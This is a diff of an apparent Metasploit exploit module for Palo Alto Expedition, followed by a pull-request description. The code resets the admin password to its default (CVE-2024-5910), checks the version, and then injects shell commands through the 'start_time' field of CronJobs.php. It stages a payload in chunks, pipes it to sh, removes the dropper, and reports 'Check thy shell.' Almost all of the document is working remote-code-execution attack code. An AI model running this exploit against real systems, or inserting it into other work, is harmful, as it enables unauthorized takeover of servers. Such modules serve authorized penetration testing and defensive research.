+      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.to_s.include?('Admin password restored to')
+
+      respass = res.to_s.match(/'([^']+)'/)[1]
+      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+      datastore['PASSWORD'] = respass
+      datastore['USERNAME'] = 'admin'
+    end
+
+    @xsrf_token_value = xsrf_token_value
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'bin/MTSettings/settings.php?param=versions'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      }
+    )
+
+    data = res.get_json_document
+    version = data['msg']['Expedition']
+
+    if version.nil?
+      return CheckCode::Unknown
+    else
+      print_status('Version retrieved: ' + version)
+    end
+
+    if Rex::Version.new(version) <= Rex::Version.new('1.2.95')
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    @xsrf_token_value ||= xsrf_token_value
+
+    print_status('Adding a new cronjob...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'add',
+        'type' => 'new_cronjob',
+        'project' => 'pandb'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    data = res.get_json_document
+    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
+
+    cmd = cmd.gsub('http://', '').gsub(':', '$(echo $PATH|cut -c16)')
+    cmds = cmd.split(';')
+    cmds.each do |c|
+      if c.length > 97
+        print_bad("Command: '#{c}' is too long. Length: #{c.length}. Try to shorten it to 97 or less characters.")
+      end
+    end
+
+    name = Rex::Text.rand_text_alpha(4..8)
+    vprint_status('Using random name: ' + name)
+    print_status('Injecting OS command...')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'set',
+        'type' => 'cron_jobs',
+        'project' => 'pandb',
+        'name' => name,
+        'cron_id' => 1,
+        'recurrence' => 'Daily',
+        'start_time' => "\"; #{cmds[0]} ;"
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'set',
+        'type' => 'cron_jobs',
+        'project' => 'pandb',
+        'name' => name,
+        'cron_id' => 1,
+        'recurrence' => 'Daily',
+        'start_time' => "\"; #{cmds[1]} ;"
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'set',
+        'type' => 'cron_jobs',
+        'project' => 'pandb',
+        'name' => name,
+        'cron_id' => 1,
+        'recurrence' => 'Daily',
+        'start_time' => "\"; #{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} ;"
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+
+    dropper = datastore['FETCH_WRITABLE_DIR'] + '/' + datastore['FETCH_FILENAME']
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'set',
+        'type' => 'cron_jobs',
+        'project' => 'pandb',
+        'name' => name,
+        'cron_id' => 1,
+        'recurrence' => 'Daily',
+        'start_time' => "\"; rm #{dropper} ;"
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+
+    print_status('Check thy shell.')
+  end
+end


### PR DESCRIPTION
This was not our original plan, but it works, and I think I like it better than the original plan.  Instead of breaking the commands apart and executing each separately, I go ahead and use the built-in encoders to create a payload of any length, break it apart and stage it in chunks to a temp file.  Then after the command is staged, I pipe the contents of the file to `sh`.
I'm basically ripping off from cmdstagers, but in a very controlled way.  It means we should be able to use any cmd payload we want to, and we don't have to do any magic and rely on a specific payload syntax or size.
This is still a bit rough- I should add a command to remove the staging file, but I can add that next week.  I do want to get another couple eyes on this to make sure I have not created a worse problem with this solution.
For some reason, this looks like maybe it is trying to overwrite everything, which is not my intention, but I did want to get your opinion of this solution.  I can clean it up next week and make sure only the changed stuff gets logged.